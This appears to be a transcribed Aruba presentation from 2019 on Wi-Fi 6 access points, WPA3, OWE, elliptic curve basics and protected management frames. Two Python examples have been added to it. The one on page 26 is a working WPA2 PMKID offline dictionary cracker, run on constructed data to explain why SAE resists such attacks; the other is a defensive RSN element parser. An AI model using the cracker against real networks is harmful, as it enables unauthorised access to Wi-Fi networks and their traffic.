Page 1: Wi-Fi 6 & Wi-Fi SecurityUpdate · 10 802.11ax vs. 802.11ac Major feature comparison Feature 802.11ac 802.11ax Impact Bands 5 GHz 2.4 and 5GHz Increased Capacity and Throughput Target

Wi-Fi 6 & Wi-Fi Security Update: Airheads Community Technology Insight

Jens Fluegel, Consulting System Engineer, April 16th 2019

Page 2

802.11ax a.k.a. Wi-Fi 6: Update April 2019

Page 3

802.11ax: Timelines and status

– Wi-Fi Alliance certification program, coming in the third quarter of 2019
  https://www.wi-fi.org/news-events/newsroom/wi-fi-certified-6-coming-in-2019

– Current 802.11ax APs released in 2018 are pre-standard, built on a partial implementation of the standard

Powered by Aruba

Page 4

802.11ax (Wi-Fi 6) Technology

Increase 4x average throughput of the entire system in a dense deployment scenario

Improve power efficiency of client devices- battery saving

Maximizing capacity and efficiency by ensuring that all devices in a crowded network get the bandwidth they require

(Figure: 802.11ac vs. 802.11ax, 4x better capacity in dense deployment)

Page 5

Wireless Standards Over Time

802.11n (2008)
• 2.4 and 5 GHz
• 40 MHz channels
• 64-QAM rates
• Up to 4 streams
• Beamforming (explicit and implicit)
• Backwards compatibility with 11a/b/g

802.11ac (2012)
• 5 GHz only
• 80 and 160 MHz channels
• 256-QAM rates
• Up to 8 streams
• Beamforming (explicit)
• Multi-user MIMO
• Backwards compatibility with 11a/b/g/n

802.11ax (2018)
• 2.4 GHz and 5 GHz
• 1024-QAM rates
• Multi-user MIMO, 8 clients
• OFDMA uplink and downlink
• Better battery life (Target Wake Time)
• Spatial re-use (BSS color)
• Enhanced outdoor long-range performance
• Backwards compatibility with 11a/b/g/n/ac

Page 6

Enhancements in 802.11ax: High-Efficiency Wireless (HEW) or Wi-Fi 6

Page 7

OFDMA (uplink and downlink) and MU-MIMO (downlink)

High performance experience with multi-user features

OFDMA
• OFDMA increases capacity
• OFDMA reduces latency for voice and IoT
• Ideal for low-bandwidth, small-packet (voice and IoT), latency-sensitive applications

MU-MIMO
• MU-MIMO increases capacity
• MU-MIMO results in higher speed and throughput per user; transmits to up to 8 clients
• Ideal for higher-bandwidth applications such as HD video or large files

(Figure: congestion and delay)

Page 8

OFDMA Resource Unit Allocation Examples

Page 9

OFDMA Performance

Page 10

802.11ax vs. 802.11ac: Major feature comparison

Feature            | 802.11ac                | 802.11ax                                           | Impact
-------------------|-------------------------|----------------------------------------------------|------------------------------------------------------
Bands              | 5 GHz                   | 2.4 and 5 GHz                                      | Increased capacity and throughput
Target Wake Time   | N/A                     | Supports TWT                                       | Reduces medium access contention, better battery life
Data rates         | 433 Mbps (80 MHz, 1 SS) | 600 Mbps (80 MHz, 1 SS); 9.60 Gbps (160 MHz, 8 SS) | Increased throughput
Highest modulation | 256-QAM                 | 1024-QAM                                           | Increased capacity
Subcarrier spacing | 312.5 kHz               | 78.125 kHz                                         | Increased capacity per channel
MU-MIMO            | DL only                 | DL and UL                                          | Better mechanism to handle uplink traffic
OFDMA              | N/A                     | DL and UL                                          | Better medium access technology, less overhead and pooling

Page 11

802.11ax (Wi-Fi 6): Feature Details

Page 12

Innovations beyond the 802.11ax standard

Aruba 500 Series Access Points

• High performance multi-user capabilities +

• Ax-aware ClientMatch

• AI-powered RF optimization

• App visibility and control

• IoT and location ready

• Smart power management

• AP operates even if there isn’t enough PoE power using Intelligent Power Monitoring (IPM)

• Aggregate the power of two PoE ports with Smart PoE

• Enhanced Security

• WPA3, enhanced open and Dynamic Segmentation

• Always on connectivity

• 24/7 network uptime with LiveUpgrade and Seamless Failover

• Energy Efficiency with Green AP

Aruba 802.11ax ( Wi-Fi 6) Series Access Points

Aruba 550 series

Aruba 530 series

Aruba 510 series

Page 13

Aruba 5xx Series Campus Access Points: Product Overview and Specifications Summary

– Wi-Fi Radio Specifications: 802.11ax Specific

– Support for all mandatory features for Wi-Fi Alliance 802.11ax wave 1 certification program*

– That includes MBO* and WPA3

– Fully backwards compatible with 11abg, 11n, 11ac

– 1024-QAM modulation (optional for WFA certification): adding 25% boost to peak datarate (short range)

– New symbol duration and format, with a 4x longer symbol and 4x narrower sub-carrier spacing: a further ~20% boost by improved efficiency (mandatory)

– Single-User MIMO (mandatory)

– Multi-User MIMO*

– Downlink (mandatory)

– Uplink (excluded): not supported on 510 Series

– Transmit Beamforming (mandatory)*

– OFDMA: Orthogonal Frequency Division Multiple Access*

– Downlink and uplink (both mandatory)

– Up to 16 Resource Units

– BSS coloring (optional)*

– Individual TWT (mandatory)*

Page 14

Aruba 5xx Series Campus Access Points: Timing and Phasing

– Software Dependencies

– At launch, with 8.4 code, only basic 802.11ax functionality will be supported (symbol, 1024-QAM rates, SU-MIMO)

– Also: WPA3

– Standard AP features missing: mesh and spectrum

– All missing features for 802.11ax WFA R1 certification will be added in future software releases

– Targeting to be ready for certification as soon as WFA kicks off the program

– Also: 802.11ax aware ClientMatch, mesh, spectrum, 512 client support

– Future enhancements: Zigbee use-cases, 802.11mc (Wi-Fi Location)

Page 15

Specifications Summary

Wi-Fi specifications:
• Dual radio: 5 GHz (4x4) and 2.4 GHz (2x2), max aggregate data rate 5.4 Gbps
• Up to 512 associated clients per radio
• Multi-gig Ethernet support/Smart Rate, IEEE 802.3bz compliant
• Deep-sleep mode support for the Green AP system feature (using NetInsight)

Power sources:
• DC power 12 Vdc, PoE power (on E0 only)
• Max power consumption (excluding USB): 20.8 W (PoE) / 16 W (DC)
• 802.3bt (class 5) and 802.3at (class 4): no restrictions
• 802.3af (class 3): only supported with IPM enabled

510 Series Campus Access Points

Controller based and Instant deployment

AP-515 AP-514

Page 16

530 Series Campus Access Points: Specifications Summary

Wi-Fi Radio Specifications:
• Dual radio: 5 GHz (4x4) and 2.4 GHz (4x4), max aggregate data rate 3.55 Gbps
• Up to 1024* associated clients per radio (recommended limit: 150 active clients)
• Multi-gig Ethernet support/Smart Rate, IEEE 802.3bz compliant

Power considerations:
• Sources: DC power 48 Vdc, PoE power (802.3at / 802.3bt)
• Max power consumption from PoE (excluding USB): 26.4 W (AP-53x)

PoE sources:
• 802.3bt (class 5) and dual 802.3at (class 4): no restrictions
• Single 802.3at (class 4): some restrictions
• 802.3af (class 3): not supported

Controller based and Instant deployment

AP-535 AP-534

Page 17

550 Series Campus Access Points: Specifications Summary

Wi-Fi Radio Specifications:
• Dual radio (8x8, 4x4) and optional tri-radio mode: 5 GHz (4x4, 4x4) and 2.4 GHz (4x4)
• Max aggregate data rate 5.95 Gbps
• Multi-gig Ethernet support/Smart Rate, IEEE 802.3bz compliant
• Up to 1024* associated clients per radio (recommended limit: 150 active clients)

Power sources:
• DC power 12 Vdc or PoE power
• Max power consumption (excluding USB): 38.2 W (AP-555)

PoE sources:
• 802.3bt (class 5) and dual 802.3at (class 4): no restrictions
• Single 802.3at (class 4): some restrictions
• 802.3af (class 3): not supported

Controller based and Instant deployment

AP-555

Page 18

Accessories and Dependencies

– Mount kits: completely new and not compatible

– All-metal, low profile mount kits (allowing minimum spacing required for cooling)

– AP ships with common piece pre-installed to back

– Multiple mount bracket kits with pieces that attach to wall/surface/rail/box

– Separate orderable in packs of 10 (only)

– AP slides into bracket, spring loaded pin is used to secure AP in bracket

– Screw is used to lock all pieces together

5x0 Series Campus Access Points

Page 19

Boost performance of multi-user with ax-aware ClientMatch

ClientMatch utilizes the multi-user capabilities (OFDMA/MU-MIMO) efficiently to boost the performance of the network

(Figure: older clients and 802.11ax clients steered by ClientMatch)

Page 20

Where 802.11ax fits in the Access Point Portfolio

Indoor Access Points
• 300 Series: Low Density (entry level)
• 303/303P Series: Low Density (budget)
• 310 Series: Mid-range Density
• 340 Series: High Density
• 510 Series: Mid-range Density, 11ax
• 530 Series: High Density, 11ax
• 550 Series: Extreme Density, 11ax

Hospitality Access Points
• 303H: Medium Density (wall-mount)

Remote Access Points
• 203R: Teleworker

Outdoor Access Points
• 360 Series: High Performance
• 370 Series: High Density
• AP-387: Point to Point

Rugged Access Points
• 318 Series: High Performance (refrigerated)

Page 21

Aruba 802.11ax series access point positioning

(Chart: price vs. performance; 310, 330 and 340 series are 802.11ac Wave 2, 510, 530 and 550 series are 802.11ax)

Page 22

802.11ax Indoor AP Platform comparison matrix

                                    | AP-51x (BRCM)           | AP-53x (QCA)           | AP-555 (QCA)
------------------------------------|-------------------------|------------------------|------------------------
5 GHz radio (HE80)                  | 4x4                     | 4x4                    | 8x8 or dual 4x4
5 GHz radio (HE160)                 | 160                     | 80+80                  | 80+80
2.4 GHz radio                       | 2x2                     | 4x4                    | 4x4
Dual-5 GHz                          | No                      | No                     | Yes*
1024-QAM                            | Yes                     | Yes                    | Yes
Max clients per radio (recommended) | 512 (100)               | 1024 (150)             | 1024 (150)
Peak data rates 5 GHz / 2.4 GHz / aggregate | 4.8 / 0.57 / 5.37 Gbps | 2.4 / 1.15 / 3.55 Gbps | 4.8 / 1.15 / 5.95 Gbps
DL-OFDMA                            | Yes                     | Yes                    | Yes
UL-OFDMA                            | Yes                     | Yes                    | Yes
DL-MU-MIMO                          | Yes                     | Yes                    | Yes
UL-MU-MIMO                          | No                      | Yes                    | Yes
Max no. of RUs (HE80)               | 16                      | 37                     | 37
Wired ports                         | 1x 2.5 Gbps + 1x 1 Gbps | 2x 5 Gbps              | 2x 5 Gbps
Peak power (with/without USB)       | 26.5 W / 20.8 W         | 32.1 W / 26.4 W        | 44.2 W* / 38.2 W
PoE-PD (typical)                    | Class 4/3               | Class 5/4              | Class 5/4
Size (internal antenna variants)    | 200 x 200 x 46 mm       | 240 x 240 x 53 mm      | 260 x 260 x 58 mm

Page 23

Affordable and easy to manage universal IoT connectivity

• Bluetooth 5 and Integrated 802.15.4 radio supports Zigbee

• Digital door locks in hotels, digital signage for retail

• Location and asset tracking support with Meridian

• Emerging IoT devices

• IoT battery saving with Wi-Fi 6 Target Wake Time (TWT)

• Better experience for latency sensitive IoT traffic with OFDMA

First Wi-Fi vendor with integrated Wi-Fi 6, Bluetooth 5, and Zigbee

Page 24

802.11ax (Wi-Fi 6) information @ Aruba
https://www.arubanetworks.com/products/networking/802-11ax/

How does 802.11ax work?

– https://www.arubanetworks.com/assets/so/SO_80211ax.pdf

– https://www.arubanetworks.com/assets/wp/WP_Multi-User-802.11ax.pdf

Learn about 802.11ax from our technical experts

– https://www.brighttalk.com/webcast/13679/329771?utm_source=ResourcePage&utm_medium=brighttalk&utm_campaign=329771

– https://www.arubanetworks.com/assets/wp/WP_802.11AX.pdf

802.11ax Reference

– https://www.arubanetworks.com/assets/so/ReferenceGuide_80211ax.pdf

Page 25

Wi-Fi Protected Access®: Update April 2019

Page 26

Wi-Fi Security needs an upgrade

– Open networks
  – All wireless traffic is passed in the clear
– WPA2
  – Legacy protocols still allowed (TKIP/WEP)
  – Protected Management Frames (PMF) optional -> active attacks (e.g. forged deauthentication)
– WPA2-Personal
  – No Perfect Forward Secrecy -> offline brute force attacks also expose previously recorded traffic
  – Passphrase used for key derivation (PMK) -> offline dictionary attack
– WPA2-Enterprise
  – Still solid security-wise, but can be deployed in ways that lessen its overall security
  – Certificate chains are often not properly checked by supplicants

Note: KRACK (https://www.krackattacks.com/) is not a break of the WPA2 ciphers; it is a key-reinstallation weakness in the 4-way handshake as specified in the 802.11 standard itself, fixed in client and AP implementations.
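Why the deck pairs "passphrase used for key derivation" with "offline dictionary attack", as an added Python example that is not part of the presentation: WPA2-Personal derives the PMK from the passphrase and the SSID alone (PBKDF2-HMAC-SHA1, 4096 iterations, 32 bytes), and the PMKID an AP can include in message 1 of the 4-way handshake is HMAC-SHA1(PMK, "PMK Name" | AP MAC | client MAC) truncated to 128 bits. A single captured frame therefore gives an attacker something to test guesses against without ever talking to the network again. The SSID, MAC addresses, passphrase and wordlist below are constructed for this example.

```python
import hashlib
import hmac

# Constructed sample network for the example (not from the deck).
SSID = "corp-guest"
AP_MAC = bytes.fromhex("0c8ddb112233")     # AA, authenticator (AP) address, constructed
STA_MAC = bytes.fromhex("3c22fb445566")    # SPA, supplicant (client) address, constructed


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-Personal PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted only with the SSID.
    Nothing per-session enters this derivation, which is why guesses can be checked offline."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def wpa2_pmkid(pmk: bytes, aa: bytes, spa: bytes) -> bytes:
    """PMKID as carried in the RSN element of EAPOL message 1:
    the first 128 bits of HMAC-SHA1(PMK, "PMK Name" | AA | SPA)."""
    return hmac.new(pmk, b"PMK Name" + aa + spa, hashlib.sha1).digest()[:16]


def crack_pmkid(captured_pmkid: bytes, ssid: str, aa: bytes, spa: bytes, wordlist):
    """Offline dictionary attack: derive the PMK for each candidate and compare PMKIDs.
    Returns the passphrase that reproduces the captured PMKID, or None."""
    for candidate in wordlist:
        guess = wpa2_pmkid(wpa2_pmk(candidate, ssid), aa, spa)
        if hmac.compare_digest(guess, captured_pmkid):
            return candidate
    return None


def demo():
    # The "capture": in practice this PMKID comes from one sniffed EAPOL frame.
    real_passphrase = "summer2019"                   # constructed weak passphrase
    captured = wpa2_pmkid(wpa2_pmk(real_passphrase, SSID), AP_MAC, STA_MAC)
    # Constructed wordlist; a real attack streams a multi-gigabyte list through the same loop.
    wordlist = ["password", "welcome1", "corp-guest", "summer2019", "Summer2019!"]
    return crack_pmkid(captured, SSID, AP_MAC, STA_MAC, wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

With SAE the PMK comes out of the Dragonfly exchange rather than directly from the passphrase, so a recorded handshake gives the attacker nothing to check a guess against offline; every guess costs a live exchange with the AP, which is what the next slide means by "resistant to dictionary attack". The missing forward secrecy shows here as well: once the passphrase is known, the PMK and, with the nonces from a recorded 4-way handshake, the session keys of every recorded session can be reconstructed.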

Page 27

WPA3: What was planned …

– Open gets replaced by OWE (Opportunistic Wireless Encryption)
  All wireless traffic gets encrypted
– PSK mode gets replaced by SAE (Simultaneous Authentication of Equals)
  The protocol is resistant to active, passive and dictionary attacks
– WPA2-Enterprise extended with Suite B grade ciphers
  Create a cipher suite and a set of rules to ensure consistent primitive security
– Enhancements to certification testing
  Too many WPA2-Enterprise certified devices did not properly check cert chains
– Improve overall security of Wi-Fi management frames, e.g. to protect against de-auth attacks
  Management frame protection becomes mandatory

Page 28

Wi-Fi Protected Access security family, April 2019

Enhanced Open™
– Opportunistic Wireless Encryption (OWE) - RFC 8110
– Elliptic Curve Diffie-Hellman (ECDH)
– Transition Mode SSIDs

WPA3™ (802.11w - Protected Management Frames (PMF) throughout)
– WPA3-Personal
  – Simultaneous Authentication of Equals (SAE)
  – RFC 7664 - Dragonfly Key Exchange
  – Elliptic Curve Cryptography (ECC)
  – Transition Mode (PMFR=0) / No Transition Mode (PMFR=1)
– WPA3-Enterprise
  – Basic: WPA2 (AES-only) + PMF
  – 192-Bit Mode: CNSA (a.k.a. Suite B)

Easy Connect™
– Device Provisioning Protocol (DPP)
– Elliptic Curve Diffie-Hellman (ECDH)

(Dan Harkins, Aruba)

Page 29

Aruba Wi-Fi certification status?
https://www.wi-fi.org/product-finder-results

Page 30

Wi-Fi CERTIFIED Enhancements with ArubaOS/Aruba Instant 8.4.0.0 and beyond

Supported features

– Enhanced Open™

– WPA3-Personal™

– WPA3-Enterprise™

– WPA3-Enterprise™ 192-Bit mode (Suite-B)

– ClearPass 6.8 Release or later required

Limitations

– Supported on the following AP models:

– AP-303, AP-305, AP-31x, AP-318, AP-32x, AP-33x, AP-34x, AP-387, AP-36x, AP-37x, AP-51x, AP-53x, AP-555

– NOT Supported on other AP models:

– AP-1xx, AP-2xx

– An error is logged when configured:
  <3761> <WARN> |stm| Virtual AP "ap225-5" rejected for AP "demo-sae-vap"; reason: AP doesn't support WPA3/OWE

– CAPs/RAPs supported – tunnel mode only!

– IAPs supported

– 802.11r together with WPA3 is NOT supported at this time

Page 31

Good to know: WPA3 and other Aruba features

Will WPA3-SAE be supported with Aruba Mesh?

– The Aruba Mesh protocol is proprietary and not 802.11s based. WPA3-SAE will not be used with Aruba Mesh for AP-to-AP authentication starting with 8.4. The long-term intention is to use WPA3-SAE with Aruba Mesh.

Will WPA3-SAE be supported with mPSK?

– WPA3-SAE will not be supported with mPSK at release time of 8.4; WPA2-PSK has to be used. WPA3-SAE support for mPSK is the longer-term plan.

Page 32

What about WPA3 certified clients?
https://www.wi-fi.org/product-finder-results

Page 33

DRAGONBLOOD - WPA3 Multiple Vulnerabilities
https://wpa3.mathyvanhoef.com/

On April 10, 2019 a research paper by Mathy Vanhoef and Eyal Ronen was released documenting a series of potential vulnerabilities in implementations of WPA3 and EAP-pwd (RFC 5931). Details on EAP-pwd vulnerabilities have not yet been released.

For more details see:

http://www.arubanetworks.com/support-services/security-bulletins/

Aruba Product Security Advisory
===============================
Advisory ID: ARUBA-PSA-2019-002
CVE: CVE-2019-9494
Publication Date: 2019-Apr-13
Status: Not affected
Revision: 1

Page 34

A short excursion to Elliptic Curve Cryptography

Page 35

What is Elliptic Curve Cryptography?
https://en.wikipedia.org/wiki/Elliptic-curve_cryptography

A public-key cryptography approach using elliptic curves over finite fields

Page 36

Elliptic Curve Cryptography: In a nutshell. Public-key cryptography and Wi-Fi

Purpose
– Key distribution and key generation
– Diffie–Hellman key agreement

Based on mathematical problems that are hard to solve
– Integer factorization -> RSA
– Discrete logarithm: b^k = a, k = log_b a -> Diffie–Hellman, DSA
– Elliptic curve discrete logarithm -> ECC (ECDH, ECDSA)

Security level of 256-bit ECC ≈ 3072-bit RSA (about 128 bits of symmetric security)

Page 37

Elliptic Curve Cryptography: In a nutshell. Elliptic curves

– An elliptic curve is the set of points (x, y) satisfying the equation

    y² = x³ + ax + b

  (with 4a³ + 27b² ≠ 0, so that the curve has no singular points)

Page 38

Elliptic Curve Cryptography: In a nutshell. Group law (= operations) applied to elliptic curves

– A group is a set of elements with an operation to combine two elements
– Axioms (requirements): closure, associativity, identity element, inverse element
– Operations:

  Point addition
    P + Q = −R, where R is the third point in which the line through P and Q meets the curve; the sum is R mirrored at the x-axis

  Scalar multiplication
    Q = n·P = P + P + ⋯ + P (n times)
    "Easy" to compute, e.g. with the double-and-add algorithm

– Logarithm problem: given Q and P, what is n such that Q = n·P?
  Over the real numbers this is not easy either, but the regular shape of the curve may allow it to be computed; the genuinely hard version of the problem appears over finite fields

Page 39

Elliptic Curve Cryptography: In a nutshell. Restriction to a finite field (𝔽p) of integers modulo p

    y² = x³ + ax + b (mod p)

p is a large prime number, e.g. 256-bit or 384-bit

(Figure: the curve's points over the integers modulo p, both axes running from 0 to p)

Page 40

Elliptic Curve Cryptography: In a nutshell. Elliptic curve point addition over finite fields (𝔽p)

Page 41

Elliptic Curve Cryptography: In a nutshell. Elliptic curve scalar multiplication over finite fields (𝔽p)

Forward computation of Q = n·P stays tractable

Given Q and P, finding n such that Q = n·P becomes computationally intractable for large numbers

This is the Elliptic Curve Discrete Logarithm Problem (ECDLP) on which ECC rests

Page 42

Elliptic Curve Cryptography: In a nutshell. Cyclic subgroups, the foundation of ECC and other crypto systems

– The set of multiples of P is a cyclic subgroup of the elliptic curve group over 𝔽p
– P is called generator or base point
– Order n = number of points in the subgroup
– Order N = number of points of the elliptic curve group
– Cofactor h = N / n (N = order of the elliptic curve, n = order of the subgroup); by Lagrange's theorem n divides N
– For our ECC algorithms we want a subgroup of large prime order n, ideally with cofactor h = 1

– Finding a base point
  1. Calculate the order N of the elliptic curve.
  2. Choose the order n of the subgroup; n must be a prime divisor of N.
  3. Compute h = N / n.
  4. Choose a random point P on the curve.
  5. Compute G = h·P.
  6. If G is 0 (the point at infinity), go back to step 4. Otherwise G generates a subgroup of order n.

Example: y² = x³ + 2x + 3 over 𝔽97 with P = (3, 6); the point satisfies the equation, 36 ≡ 27 + 6 + 3 (mod 97)

    n·P = P + P + ⋯ + P

Page 43

Elliptic Curve Cryptography: In a nutshell. Summary

Elliptic curve algorithms work in a cyclic subgroup of an elliptic curve over a finite field.

Summary of elliptic curve domain parameters (p, a, b, G, n, h)
– Prime p: size of the field in which x and y live (256-bit, 384-bit, …)
– Coefficients a and b of the elliptic curve equation y² = x³ + ax + b
– Base point / generator G
– Order n of the subgroup generated by G
– Cofactor h

1. The private key is a random integer d chosen from {1, …, n − 1} (where n is the order of the subgroup).
2. The public key is the point H = d·G (where G is the base point of the subgroup).

If we know d and G (and the domain parameters), finding H is "easy".

If we know H and G, finding the private key d is "hard" because it requires solving the discrete logarithm problem.

Page 44

802.11w: Protected Management Frames (PMF)

Page 45

IEEE 802.11w - PMF (Protected Management Frame)

PMF (Protected Management Frame) = MFP (Management Frame Protection) = 802.11w

• Provides protection for unicast and multicast management action frames
  ⎻ Protection against eavesdropping and forging for unicast management action frames
  ⎻ Protection against forging for multicast management action frames
• Augments the privacy protections already in place for data frames
• 802.11w introduced PMF to secure management frames against attacks

Page 46

IEEE 802.11w - PMF (Protected Management Frame)

• Supported in D-tunnel and bridge mode in 8.3 and prior releases (configuration required in the SSID profile)
• Included with OWE/WPA3 in AOS 8.4 (tunnel mode ONLY), no configuration needed
• Capabilities advertised in the RSN Information Element:
  ⎻ MFP Required (MFPR = 1) & MFP Capable (MFPC = 1): only 11w-capable clients can connect
  ⎻ MFP not required (MFPR = 0) & MFP Capable (MFPC = 1): 11w-capable and non-11w-capable (legacy) clients can connect
• RSN IE advertised in Beacons, Probe Responses and Association Requests

Page 47

IEEE 802.11w - PMF (Protected Management Frame)

• List of management frames validated for 11w protection:
  ⎻ Deauthentication (from AP)
  ⎻ Disassociation (from 11w client)
  ⎻ QoS
  ⎻ ADDBA negotiation
  ⎻ Block Ack
  ⎻ Radio Measurement
  ⎻ SA Query
  ⎻ WNM (used for Hotspot)

Page 48

IEEE 802.11w - MFP (Management Frame Protection) Capabilities advertised in RSN IE

Page 49

802.11w & WPA3 modes: Which clients can connect?

(Matrix: client types vs. SSID modes)
Client types: Open; OWE; WPA2-AES, not 11w-capable; WPA2-AES, 11w-capable; WPA3; WPA3 Suite B-capable
SSID modes: Open; OWE (Transition Mode); OWE only; WPA2-AES; WPA3-SAE (Transition Mode); WPA3-SAE only; WPA3-Enterprise Basic; WPA3-Enterprise 192-Bit Mode

• WPA3-Enterprise Basic = WPA2 + PMF enabled
• WPA3 clients connected to a WPA3 SSID have to use 802.11w
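The MFPC/MFPR bits from the PMF slides live in the RSN Capabilities field of the RSN element, next to the cipher and AKM suite lists that distinguish WPA2-PSK, SAE, OWE and Suite B. The following Python parser is an added example, not code from the deck or from Aruba: it decodes the element as laid out in IEEE 802.11 (element ID 48, suite selectors under OUI 00-0F-AC, MFPR and MFPC as bits 6 and 7 of the capabilities field), constructs RSN elements for several of the SSID modes in the matrix, and applies the admission rule the slides state (an MFPR=1 BSS admits only 802.11w-capable clients, MFPR=0/MFPC=1 admits legacy clients too). Every sample element is constructed here; the length checks matter because this element arrives in unauthenticated beacons and probe responses.

```python
import struct
from dataclasses import dataclass

# Suite selectors under the IEEE 802.11 OUI 00-0F-AC (IEEE 802.11-2016, 9.4.2.25).
IEEE_OUI = b"\x00\x0f\xac"
CIPHERS = {2: "TKIP", 4: "CCMP-128", 6: "BIP-CMAC-128", 8: "GCMP-128",
           9: "GCMP-256", 10: "CCMP-256", 12: "BIP-GMAC-256"}
AKMS = {1: "802.1X", 2: "PSK", 5: "802.1X-SHA256", 6: "PSK-SHA256",
        8: "SAE", 12: "802.1X-SuiteB-192", 18: "OWE"}
RSN_ELEMENT_ID = 48
MFPR, MFPC = 0x0040, 0x0080          # RSN Capabilities bits 6 (required) and 7 (capable)


def _suite_name(table: dict, selector: bytes) -> str:
    if selector[:3] != IEEE_OUI:
        return f"vendor-{selector[:3].hex()}-{selector[3]}"
    return table.get(selector[3], f"ieee-{selector[3]}")


@dataclass
class RsnInfo:
    group_cipher: str
    pairwise_ciphers: list
    akms: list
    mfpc: bool
    mfpr: bool
    group_mgmt_cipher: str = "none"

    @property
    def pmf_policy(self) -> str:
        return "required" if self.mfpr else ("optional" if self.mfpc else "disabled")


def parse_rsn_ie(element: bytes) -> RsnInfo:
    """Parse a complete RSN element (ID, length, body); every length is checked before use."""
    if len(element) < 2 or element[0] != RSN_ELEMENT_ID or element[1] != len(element) - 2:
        raise ValueError("not a well-formed RSN element")
    body, off = element[2:], 0

    def take(n: int) -> bytes:
        nonlocal off
        if off + n > len(body):
            raise ValueError("truncated RSN element")
        chunk = body[off:off + n]
        off += n
        return chunk

    def take_u16() -> int:
        return struct.unpack("<H", take(2))[0]

    if take_u16() != 1:
        raise ValueError("unsupported RSN version")
    group = _suite_name(CIPHERS, take(4))
    pairwise = [_suite_name(CIPHERS, take(4)) for _ in range(take_u16())]
    akms = [_suite_name(AKMS, take(4)) for _ in range(take_u16())]
    caps = take_u16()
    info = RsnInfo(group, pairwise, akms, bool(caps & MFPC), bool(caps & MFPR))
    if off < len(body):                  # optional PMKID list, then group management cipher
        for _ in range(take_u16()):
            take(16)
        if off < len(body):
            info.group_mgmt_cipher = _suite_name(CIPHERS, take(4))
    return info


def build_rsn_ie(group: int, pairwise: list, akms: list, caps: int, group_mgmt: int = None) -> bytes:
    """Encode an RSN element; used here only to construct the sample beacons for the example."""
    body = struct.pack("<H", 1) + IEEE_OUI + bytes([group])
    body += struct.pack("<H", len(pairwise)) + b"".join(IEEE_OUI + bytes([c]) for c in pairwise)
    body += struct.pack("<H", len(akms)) + b"".join(IEEE_OUI + bytes([a]) for a in akms)
    body += struct.pack("<H", caps)
    if group_mgmt is not None:
        body += struct.pack("<H", 0) + IEEE_OUI + bytes([group_mgmt])   # zero PMKIDs, then BIP suite
    return bytes([RSN_ELEMENT_ID, len(body)]) + body


def client_can_associate(ap: RsnInfo, client_akms: list, client_pmf_capable: bool) -> bool:
    """Admission rule from the slides: a shared AKM is needed, and an MFPR=1 BSS admits only
    802.11w-capable clients, while MFPR=0 with MFPC=1 also admits legacy (non-11w) clients."""
    if not set(client_akms) & set(ap.akms):
        return False
    return client_pmf_capable or not ap.mfpr


# Constructed sample BSS advertisements for the SSID modes in the matrix (not captures).
SAMPLE_IES = {
    "wpa2-psk-legacy":     build_rsn_ie(4, [4], [2], 0),                 # CCMP, PSK, no PMF at all
    "wpa3-sae-transition": build_rsn_ie(4, [4], [2, 8], MFPC),           # PSK + SAE, PMF optional
    "wpa3-sae-only":       build_rsn_ie(4, [4], [8], MFPC | MFPR),       # SAE, PMF required
    "owe":                 build_rsn_ie(4, [4], [18], MFPC | MFPR),      # Enhanced Open, AKM 18
    "wpa3-ent-192":        build_rsn_ie(9, [9], [12], MFPC | MFPR, 12),  # GCMP-256 + BIP-GMAC-256
}


def summarize(name: str) -> tuple:
    info = parse_rsn_ie(SAMPLE_IES[name])
    return tuple(info.akms), tuple(info.pairwise_ciphers), info.pmf_policy, info.group_mgmt_cipher
```

`summarize("wpa3-sae-only")` yields `(("SAE",), ("CCMP-128",), "required", "none")`, and `client_can_associate` with that element rejects a PSK-only or non-11w client, which is the "only 11w-capable clients can connect" case; the transition element admits both.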

Page 50

CLI updates: show ap bss-table

Page 51

CLI updates: show ap association

Page 52

Wi-Fi CERTIFIED Enhanced Open™ Opportunistic Wireless Encryption (OWE)

Page 53

Wi-Fi CERTIFIED Enhanced Open™: Adding encryption behind the scenes to open networks

– Based on RFC 8110 - Opportunistic Wireless Encryption
– Provides unauthenticated data encryption on 802.11 "Open" Wi-Fi networks
– Transparent to users & admins: looks just like open, no provisioning, no "lock icon"
– Backward compatible via "Transition Mode" using two BSSIDs
– This is only encryption, no authentication
  – Unauthenticated Elliptic Curve Diffie-Hellman (ECDH) at association time generates a unique PMK per client
  – The PMK is used in the 4-way handshake after association
  – No authentication of the AP to the client, so no protection against honeypot APs, evil twins etc.
  – Existing additional authentication techniques like captive portal or MAC authentication are still required/valid

Page 54

Opportunistic Wireless Encryption (OWE): Handshake

AP -> STA: Beacon / Probe Response (RSN: AKM = OWE)
STA -> AP: Authentication Request (Open System)
AP -> STA: Authentication Response (Open System)
STA: generate random c (private key), compute point C = c·G
STA -> AP: Association Request (AKM = OWE, DH: group, public key C)
AP: generate random a (private key), compute point A = a·G
AP -> STA: Association Response (AKM = OWE, DH: group, public key A)
STA: PMK = c·A = c·a·G, PMKID = Hash(C | A)
AP: PMK = a·C = a·c·G = c·a·G, PMKID = Hash(C | A)
STA <-> AP: EAPOL 4-way handshake -> traffic keys

• Both sides use the same ECDH domain parameters, including the base point G
• An eavesdropper sees C and A but cannot compute c, a or the PMK without solving the discrete logarithm problem
• If PMK caching is used, the association response carries no DH element
• DH group 19 (a 256-bit elliptic curve group) is required to be compliant

Slide 56

How does OWE Transition Mode work?

• Advertisement and Discovery

1. Administrator configures a single Open SSID and virtual AP

2. AP automatically creates two BSSes with separate beacons

i. BSS1 = normal “Open” network for non-OWE stations; a new (OWE Transition Mode) IE points to BSS2

ii. BSS2 = hidden OWE RSN with AKM = 18 (00-0F-AC:18); a new IE points back to BSS1

3. An OWE STA does active or passive scanning and discovers the OWE-capable AP via the RSN IE

• Authentication and Association

1. Normal 802.11 “Open” Authentication

2. Diffie-Hellman Parameter element added to the Association Request/Response

Slide 57

Why Transition Mode?

• To provide backward compatibility with legacy (non-OWE) clients

⎻ Legacy clients connect to the “Open System” SSID (no security benefits)

⎻ OWE-capable clients connect to the hidden SSID (PMF and encryption benefits)

One drawback: one additional SSID is advertised for every OWE SSID, which needs to be accounted for (each transition-mode SSID costs a second BSS and its beacons)

Slide 58

OWE Transition Mode Connection

(Screenshots: AP BSS Table, AP Association Table, auth-tracebuf output)

The automatically created open VAP carries the prefix “_owetm_”: “_owetm_<VAPName>_Checksum”

Slide 59

OWE Transition Mode Beacons (screenshot of the two beacons)

Slide 60

OWE Transition Mode Association (screenshots: Association Request, Association Response)

Slide 61

